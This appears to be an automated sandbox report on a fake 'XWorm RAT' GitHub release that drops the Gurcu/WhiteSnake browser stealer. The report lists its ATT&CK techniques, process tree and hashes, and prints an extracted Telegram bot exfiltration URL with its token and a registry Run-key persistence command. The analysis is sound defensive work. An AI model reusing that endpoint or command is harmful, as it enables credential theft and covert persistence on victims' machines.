gurcu | hxxps://github[.]com/Intestio/XWorm-RAT/releases/tag/xworm

max time kernel
111s
max time network
108s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-01-2025 18:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Intestio/XWorm-RAT/releases/tag/xworm

Score

10^/10

gurcu discovery persistence spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot8077286634:AAG1XHb6leJVqlqfJbmVoJd2ysHqXSznNdQ/sendDocument?chat_id=-1002258988684&caption=%F0%9F%93%82%20-%20Browser%20data%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%82%20-%20cookies(0.25%20kb)%0A%E2%94%9C%E2%94%80%E2%94%80%20%F0%9F%93%84%20-%20BrowserDownloads.txt%20(0.21%20kb

Signatures

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	Command Reciever.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	conhost.exe

Executes dropped EXE 2 IoCs

pid	Process
3784	Command Reciever.exe
808	conhost.exe

Loads dropped DLL 2 IoCs

pid	Process
3784	Command Reciever.exe
808	conhost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\AdobeUpdate\\conhost.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
84	raw.githubusercontent.com
92	raw.githubusercontent.com
83	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
80	ip-api.com

Enumerates processes with tasklist 1 TTPs 1 IoCs

discovery

Process Discovery

T1057

pid	Process
3764	tasklist.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	XWorm RAT V2.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Command Reciever.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4560	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1364	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3088	msedge.exe
3088	msedge.exe
2352	msedge.exe
2352	msedge.exe
3256	identity_helper.exe
3256	identity_helper.exe
3452	msedge.exe
3452	msedge.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
3784	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
808	conhost.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe
2136	Command Reciever.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3784	Command Reciever.exe
Token: SeDebugPrivilege	3764	tasklist.exe
Token: SeDebugPrivilege	808	conhost.exe

Suspicious use of FindShellTrayWindow 55 IoCs

pid	Process
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2136	Command Reciever.exe

Suspicious use of SendNotifyMessage 25 IoCs

pid	Process
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2352	msedge.exe
2136	Command Reciever.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 1632	2352	msedge.exe	83
PID 2352 wrote to memory of 1632	2352	msedge.exe	83
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 2712	2352	msedge.exe	84
PID 2352 wrote to memory of 3088	2352	msedge.exe	85
PID 2352 wrote to memory of 3088	2352	msedge.exe	85
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86
PID 2352 wrote to memory of 5024	2352	msedge.exe	86

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Intestio/XWorm-RAT/releases/tag/xworm
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc6cca46f8,0x7ffc6cca4708,0x7ffc6cca4718
  2⤵
  PID:1632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
  2⤵
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
  2⤵
  PID:5024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:2244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:3716
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8
  2⤵
  PID:3316
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:2412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
  2⤵
  PID:1000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:2288
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  PID:3880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5900 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,14385493415471485872,9737657933274506626,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6420 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3452

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2564

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:432

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2412

C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe
"C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:716
- C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe
  "C:\Users\Admin\Downloads\XWorm-RAT-main\XWorm-RAT-main\XWorm RAT V2.1\Command Reciever.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2136
- C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe
  "C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3784
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpD869.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpD869.tmp.bat
    3⤵
    PID:2932
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:2224
  - - C:\Windows\system32\tasklist.exe
      Tasklist /fi "PID eq 3784"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3764
  - - C:\Windows\system32\find.exe
      find ":"
      4⤵
      PID:3744
  - - C:\Windows\system32\timeout.exe
      Timeout /T 1 /Nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4560
  - - C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe
      "C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:808
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
        5⤵
        
        PID:4796
      - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f
        6⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:1364

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:5004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0a9dc42e4013fc47438e96d24beb8eff

SHA1
806ab26d7eae031a58484188a7eb1adab06457fc

SHA256
58d66151799526b3fa372552cd99b385415d9e9a119302b99aadc34dd51dd151

SHA512
868d6b421ae2501a519595d0c34ddef25b2a98b082c5203da8349035f1f6764ddf183197f1054e7e86a752c71eccbc0649e515b63c55bc18cf5f0592397e258f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
61cef8e38cd95bf003f5fdd1dc37dae1

SHA1
11f2f79ecb349344c143eea9a0fed41891a3467f

SHA256
ae671613623b4477fbd5daf1fd2d148ae2a09ddcc3804b2b6d4ffcb60b317e3e

SHA512
6fb9b333fe0e8fde19fdd0bd01a1990a4e60a87c0a02bc8297da1206e42f8690d06b030308e58c862e9e77714a585eed7cc1627590d99a10aeb77fc0dd3d864d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
a68fa0156ac0af5bcc9a56e55a0540e9

SHA1
ee413f4a40eb0bd1e1f7966543fb154d92ec5d1c

SHA256
ef961c4bdd0c689f2b93b09ad04d26079b62ec1e92c3ddafb35c46c02740a3d4

SHA512
4b794636974c5538d014f118545b37c733517fe5b3627f6b658b0d6ddce35d0cf6105da5d43e860caf66026654625a6decc937205d82adf52772fc392f7152ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
d33a77a2ab8d05a8676fd3324034fb27

SHA1
4e90932ff8f38383db3199c911bacf3632dd3b43

SHA256
1934f3f03ebd15db7efce9db580ff6cfac7ba5e891365669fdee2d6fed021ed8

SHA512
5737c59da1d62366a5bba4819332928ff087419dab55a35b614df004ee4c6fee93948c053d9b3f74046534eb77fa2459c232633888a01e60d749be143ee4f1c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
14decbf32c80a3cfe4bcb9727bba3722

SHA1
771d1d3f295dcae89f91ebc3e089c687a4e75aee

SHA256
924b88cd0ec1382a2171a6363e749247e44626dc7be796015f52a6d8be17be2a

SHA512
47756929313481f8476231f4648efa234f351a14a78ec094be4835441e21002c02d89f06f94534732dc9e9c7f7149a7af46eea064df0012ceabe352f9d68c7e8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
573B

MD5
2e6e73e80e60a9a61925cba10636e275

SHA1
eca781f9e0637616ba50e634ebef795e6d63c054

SHA256
a361999a859cb53b7a91663ac16c05ee90f570d8b8bef391aee55471226d5401

SHA512
44c7e45cbf391a13ae2ac1b2c5360d1097eb8d2d7218d6027e48f5b6b6ab6b68da46fe278bb3ff29fd3696f308450fe706e3335ddbbc61f16fc79a66b7d9dfc1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
93cd48d34ebbac20f1c551dd4a0d36e5

SHA1
4ae61b64c04f375172a0aea03492304adeed9d7c

SHA256
23a9fadca6e8e1a3d5a688fcceba6383db0c6ce6a0867237237748e7c19fa6df

SHA512
24fe92ea0700578bfac142815064872559713699105414d6087d2525789562489989448424ecfb031adc5b8e9322cb94f8ddfab73ea03e1ecd54df6d32522627

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d408f7a8d9fe789d0ed8cc51e6c31521

SHA1
eeff3c9f4f4970da0b08c6871ed232706c7e6ce4

SHA256
0779e10f287538b5bbe9949fbf0f5133870afa993dbaff404e31f9214c7611d9

SHA512
9dbeb0413a1e6b18eedd71538d685815b0753e670d5ddf653f49de893b8310916604c6ace26d623ab31ed4ba561581d01311504ee49e64e8512f78288eb0fda2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
513508a0539458e7cb20886bd13c53c2

SHA1
55de3e08933d9e0d74cdc41ec7a285969564eac1

SHA256
f7297cb6bd0c753e641642f392e3b15d337bcf47acbff9795f8756ccc011ba2e

SHA512
15d2ce1dee6310e803e261c9c9829170d267f1e9e19c376199e1b86a239c36f540cfc757c766226c4cd0b9757b6dba6839e00a48d32f665165e4e49499b0c6f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
045c4f4b00db60f048b0e3b7474916b3

SHA1
e66db4add9d655e2834239b56dc0ff91457f569e

SHA256
155b25a5c198fe85da6773c56901f297d8cefb63f0befb6e46033aadfda01215

SHA512
a09c14dc864e10a697a565863507f8b523749d71e90a8d427f3ff521c185c836f0d637b32ffa8e2c27338dd38bcb88e181b676a5a244747fc200a41c35f802a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
10b4ff6cb12f5438a9297f468bfcb098

SHA1
aab5d45ada108526e1e093e6bd8bfbba2339c45f

SHA256
baa73797a89e73c375ddbba29ba23a8eee7ae945853927c9701f4ff60a579f62

SHA512
02b77fa5af7d52443cf1709c7cf965a1da2dbb211421bfb86823c810bb9004199360efccbcfb91f100b4a56075a3d0d7200a85bb77731f85584b9105a477cd0a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
874B

MD5
88a134076fce37fb0c7fee5086a97070

SHA1
0b54344f43b6091570cc546bd5769969f47c00c6

SHA256
e1cc5388d90cfd960422120b8bd873e5aeee4834d08c3a5e95312ab290f0976a

SHA512
5a48aad8d8e5381255b7e2ef566beaefc09ff8f6fbef41b4b3114e7b4bcc89d8b804bfa10087d2f4b59a805b699a6aa6b122e01bb6c8a4b53b9aa741a8e3b72a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
4643119654edd70beae069441007a53b

SHA1
c2dfd0a8019fc3c8768f5d05c781436c6c6e273d

SHA256
d0c7e30243d9fc12192251481253434d3cadc1dcfecf6c350a0ce0406464c0e8

SHA512
